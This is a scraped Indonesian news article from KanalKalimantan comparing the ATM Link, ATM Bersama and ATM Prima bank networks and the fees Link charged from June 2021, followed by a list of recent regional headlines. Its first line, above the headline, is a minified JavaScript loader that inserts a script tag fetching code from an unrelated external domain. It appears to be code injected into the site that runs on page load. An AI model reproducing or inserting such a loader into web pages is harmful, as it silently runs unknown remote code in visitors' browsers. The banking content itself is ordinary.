(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Bisnis

Perbedaan ATM Link, ATM Bersama, dan ATM Prima


KANALKALIMANTAN.COM – ATM Link tengah menjadi sorotan setelah memutuskan akan memberi biaya transaksi untuk cek saldo dan tarik tunai. Tak cuma Link, sistem ATM seperti itu sebelumnya telah ada yaitu ATM Bersama dan ATM Prima. Lantas apa perbedaan ATM Link, ATM Bersama, dan ATM Prima?

Berikut ini perbedaan ATM Link, ATM Bersama dan ATM Prima yang perlu kalian ketahui.

1. ATM Link

ATM LINK merupakan jaringan ATM milik BUMN yang tergabung dalam Himpunan Bank Negara (Himbara) antara lain BNI, BRI, Bank Mandiri dan BTN. Saat ini terdapat 53 ribu ATM Link yang tersebar di Indonesia.

Baca juga: Himpun ZIS 5,7 Miliar, Baznas Kalsel Salurkan 1,7 Miliar dengan Berbagai Program

Oleh karena itu ATM Link lebih mudah dijangkau oleh nasabah karena sudah terdapat dimana saja. Mulai tanggal 1 Juni 2021, ATM Link akan dikenakan biaya transaksi sebesar Rp 2.500 untuk cek saldo, tarik tunai sebesar Rp 5.000 dan transfer sebesar Rp 4.000.

2. ATM Bersama

ATM Bersama merupakan jaringan interbank yang ada di Indonesia. Jaringan ATM ini dimiliki oleh PT Artajasa Pembayaran Elektronik. Sejak didirikan pada tahun 1993, ATM Bersama telah menggabungkan hingga 21 bank dengan 80 ribu mesin ATM yang tersebar di Indonesia.

Layanan yang dapat digunakan oleh nasabah adalah mengakses layanan cek saldo, penarikan uang tunai, serta online transfer antarbank. Bank yang telah tergabung dengan jaringan ATM Bersama ini antara lain adalah Bank Daerah (Bank Jatim, Bank DKI, dll), Bank Muamalat, CIMB Niaga, Citibank, HSBC, Bank Bukopin, dan masih banyak lainnya.

Baca juga: Pengamanan Pilkades Serentak 24 Mei, Polres Banjar Turunkan 245 Personil

3. ATM Prima

ATM Prima merupakan jaringan interbank yang dimiliki oleh PT Rintis Sejahtera. Jaringan bank ini telah terhubung dari 80 bank di Indonesia dan memiliki fitur Online Settlement yang dapat memproses settlement antarbank dalam 1 hari kerja.

Saat ini bank yang tergabung dengan ATM Prima antara lain seperti BCA, BRI, OCBC NISP, BNI, Bank Mandiri Syariah, CIMB Niaga dan masih banyak lainnya. ATM ini telah digunakan lebih dari 73.000 ATM di Indonesia yang dapat melakukan cek saldo, tarik tunai dan transfer antarbank secara online selama 24 jam.

Perlu diketahui, mulai tanggal 1 Juni 2021, Bank BUMN yakni PT Bank Mandiri (Persero) Tbk, PT Bank Negara Indonesia (Persero) Tbk, PT Bank Rakyat Indonesia (Persero) Tbk, dan PT Bank Tabungan Negara (Persero) Tbk akan mengenakan biaya transaksi untuk cek saldo dan tarik tunai pada ATM Link. Padahal sebelumnya, nasabah dari keempat bank tersebut tidak dikenakan biaya atau gratis dalam melakukan transaksi pada ATM Link.

Baca juga: Dari Panggung New York Fashion Week, Vivi Zubedi Ngurusi “Warung Ummat” hingga “Dauroh Janaiz” di Banjarbaru

Untuk cek saldo, nasabah bank harus membayar sebesar Rp 2.500, tarik tunai sebesar Rp 5.000 dan transfer sebesar Rp 4.000. Biaya transaksi tersebut akan otomatis didebit langsung dari rekening nasabah saat melakukan transaksi melalui ATM Link.

Nasabah masih tetap dapat melakukan transaksi melalui ATM Link maupun non Link lainnya seperti ATM Bersama maupun ATM Prima. Na, seperti itulah keunggulan dan perbedaan ATM Link, ATM Bersama dan ATM Prima. (suara.com)

Editor : kk


Al Ghifari

Recent Posts

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

2 menit ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

1 jam ago

DED Pemasangan ATCS Tugu Adipura Masih Penyempurnaan Kajian

Kadishub Banjarbaru: Setelah Kajian Selesai, Berikutnya Perizinan BPJN dan BPTD Read More

2 jam ago

Hadiri HUT ke-44 Dekranas, Ini Kata Ketua Dekranasda HSU

KANALKALIMANTAN.COM, SOLO - Ketua Dewan Kerajinan Nasional Daerah (Dekranasda) Hulu Sungai Utara (HSU) Gusti Elvira… Read More

2 jam ago

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

4 jam ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

4 jam ago

This website uses cookies.